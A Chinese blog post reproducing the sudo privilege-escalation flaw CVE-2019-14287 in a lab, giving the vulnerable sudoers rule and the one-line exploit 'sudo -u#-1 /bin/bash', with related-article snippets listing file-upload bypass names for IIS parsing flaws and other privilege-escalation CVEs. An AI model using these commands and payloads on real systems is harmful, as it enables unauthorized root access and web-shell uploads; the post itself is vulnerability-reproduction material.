java漏洞提权_【漏洞复现】CVE-2019-14287 sudo提权漏洞复现

最新推荐文章于 2024-05-09 20:56:34 发布
最新推荐文章于 2024-05-09 20:56:34 发布
阅读量84 收藏
点赞数
文章标签: java漏洞提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42410317/article/details/114143624
版权

bce285eb9b5c88352711173e29dd6b42.png

漏洞描述#

2019年10月14日,CVE官方发布了CVE-2019-14287的漏洞预警。通过特定payload,用户可提升至root权限。

Sudo 的全称是“superuserdo”,它是Linux系统管理指令,允许用户在不需要切换环境的前提下以其它用户的权限运行应用程序或命令,通常是以 root 用户身份运行命令,以减少 root 用户的登录和管理时间,同时提高安全性。

2019年10月14日,Sudo官方发布了Sudo 1.8.28版本,其中包含sudo root权限绕过漏洞的补丁修复,该漏洞编号为CVE-2019-14287。

利用前提

sudo -v < 1.8.28

知道当前用户的密码

当前用户存在于sudo权限列表

漏洞复现#

环境:

Linux parrot

Linux parrot 4.19.37-parrot1-amd64 #1 SMP Parrot 4.19.37-5parrot1 (2019-06-22) x86_64 GNU/Linux

前提,查看sudo版本,确定是否小于1.8.28

sudo -V

2ec1de815c342a9aa6feedf8bff76e3d.png

编辑/etc/sudoers文件,增加对shungg账户设置的权限

vi /etc/sudoers

shungg  ALL=(ALL,!root) /bin/bash

503c9bbf524a26b8dcfa64218b9711a2.png

wq! 保存退出.

shungg用户登录执行

sudo -u#-1 /bin/bash

ff40a137cfd6700a6498253199cda121.png

漏洞利用成功。

修复建议#

由 @shungg 改版而来

喜欢 (4)or分享 (0)

平安是福13031664853
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
关于Cve-2019-14287 sudo漏洞失败的问题
weixin_43144118的博客
11-08 365
关于Cve-2019-14287 sudo漏洞失败的问题 2019年10月14日, sudo 官方在发布了 CVE-2019-14287 的漏洞预警。 漏洞解释:https://blog.csdn.net/qq_18501087/article/details/102569919 也就是说,当在命令行中加上“-1”,本来没有root限的用户会拥有root限。 过程如图: 按照漏...
Windows最最最常见的几种方法
2301_80115097的博客
12-12 875
Windows SMB 服务器特漏洞(CVE漏洞编号:CVE-2016-3225)当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特漏洞,成功利用此漏洞的攻击者可以使用升的特执行任意代码。高自己在服务器中的限,主要针对网站渗透过程中,当渗透某一网站时,通过各种漏洞升WEBSHELL限以夺得该服务器限,通常是把普通用户的升到管理员限或者系统限。要利用此漏洞,攻击者首先必须登录到系统。
sudo自动输入密码--java执行交互式命令
05-31
参考了java版的expect4j,expectj的原理,进行了极大的简化,可完成基本的功能: 1,运行java代码,执行交互式命令 2,sudo,自动输入密码(echo "password" | sudo -S mkdir /opt/test)
网络安全最全漏洞和域渗透历史漏洞整理_tw_include_fbe_metadata_decrypt,蚂蚁金服4面网络安全高级开发
最新发布
2401_84264630的博客
05-09 347
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
java漏洞_sudo 漏洞CVE-2019-14287)
weixin_33512961的博客
02-13 190
(该文参考网络他人资料,仅为学习,不许用于非法用途)一、环境1、sudo版本小于1.8.28的Linux系统2、sudo 是Linux系统命令,让普通账号以root身份去执行某些命令,比如:安装软件、查看某些配置文件、关机、重启等操作、如果普通用户需要使用sudo,需要将修改配置文件/etc/sudoers,将sudo使用赋予该账号sudo 漏洞是一个安全策略绕过问题,去执行某些敏感的命令,...
java漏洞_渗透之各种解析漏洞上传
weixin_30008295的博客
02-16 134
进后台找上传点,尝试一下jpg的图片然后,看看能不能上传,如果能上传尝试下iis解析漏洞如果不是iis,看看版本有没其他的解析漏洞或者上传漏洞查看那下编辑器版本,找编辑器漏洞。。常见解析漏洞利用方法1.asp;.jpg1.asp;.gif1.asp;1.jpg1.cer;.jpg1.asa;.jpga.aspx.a;.a.aspx.jpg..jpg自动重命名的解析漏洞如果不能用的话尝试 名小子各种...
java漏洞_Windows Java Usage Tracker本地漏洞分析(CVE-2018-3211)
weixin_35907524的博客
02-16 156
前言近期,我们发了一个Java Usage Tracker中的设计缺陷,可导致攻击者创建任意文件,注入指定我们通过Zero Day Initiative,与在本文中,我们将深入研究这一漏洞在Windows上的出原因、Java Usage Tracker的OracleJava Usage Tracker在Java中,有一个名为JavaUsage Tracker的功能,用于跟踪系统中Java的使用...
java漏洞_CVE-2018-3211:Java Usage Tracker本地漏洞分析
weixin_29783347的博客
02-13 181
一、前言我们发Java Usage Tracker中存在设计缺陷(或者脆弱点),攻击者可以利用该缺陷创建任意文件、注入攻击者指定的参数以及升本地限。这些攻击手段也能组合使用实升,以便访问受影响系统中其他应用或者用户不能访问的某些保护资源。我们通过Zero Day Initiative与Oracle合作修了这个漏洞,厂商已经在10月份补丁中推出了安全更新。因此,用户以及企业应当尽快安...
DirtyCow漏洞CVE-2016-5195)1
08-08
脏牛(Dirty Cow)漏洞,全称为“竞争条件写入时制”(Copy-on-Write Race Condition),在2016年被发,其安全漏洞编号为CVE-2016-5195。这个漏洞主要影响的是Linux内核,特别是从2007年的2.6.22版本到修前的...
BadPotato:Windows升BadPotato
03-19
坏土豆 Windows 2012-2019 Windows 8-10 引用
Windows本地漏洞(CVE-2021-1732)
小小猪的博客
12-18 1551
Windows本地漏洞(CVE-2021-1732) 简介: 2021年2月10日,微软每月的例行补丁包中修了一个Windows系统本地漏洞,本地攻击者可以利用此漏洞升到system限,据称此漏洞被用于定向攻击活动 漏洞概述: 该漏洞由函数win32kfull!xxxCreateWi ndowEx 对应用层回调返回数据校验不严导致,本地用户执行漏洞利用程序获取系统限 影响范围: Windows Server, version 20H2 (Server Core Instal
DC1-9靶机总结
问彡心的博客
09-27 1698
使用Drupal的漏洞查看能以root身份执行的文件列表结果显示有find命令通过find与系统命令结合,进入root身份的shell控制台。
VMware Tools本地漏洞CVE-2022-31676分析与
Button12138的博客
01-31 1015
VMware Tools本地漏洞CVE-2022-31676分析与
Windows系统简单总结
Aiwin的博客
07-13 1826
Windows系统简单总结
Windows工具 CVE-2019-1405 & CVE-2019-1322
K8哥哥
07-15 1608
漏洞介绍 由NCC Group研究人员所发的两个通过COM本地服务进行非法漏洞。第一个漏洞CVE-2019-1405是COM服务中的一个逻辑错误,可让本地普通用户以LOCAL SERVICE身份执行任意命令。第二个漏洞CVE-2019-1322是一个简单的服务配置错误,可让本地SERVICE组中的任何用户重新配置以SYSTEM限运行的服务(此漏洞也被其他研究人员发)。当以上两个漏洞结合在一起时,就允许本地普通用户以SYSTEM限执行任意命令。 全面检查了一些Windows服务,发以LOCAL
linux sudo漏洞,linux CVE-2019-14287 Sudo漏洞(示例代码)
05-19
CVE-2019-14287是一个sudo漏洞,攻击者可以利用此漏洞绕过sudo的限制,以root用户的身份执行命令。这个漏洞影响sudo 1.8.28版本之前的所有版本。下面是一个示例代码: ``` $ sudo -u#-1 id uid=0(root) gid=0...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值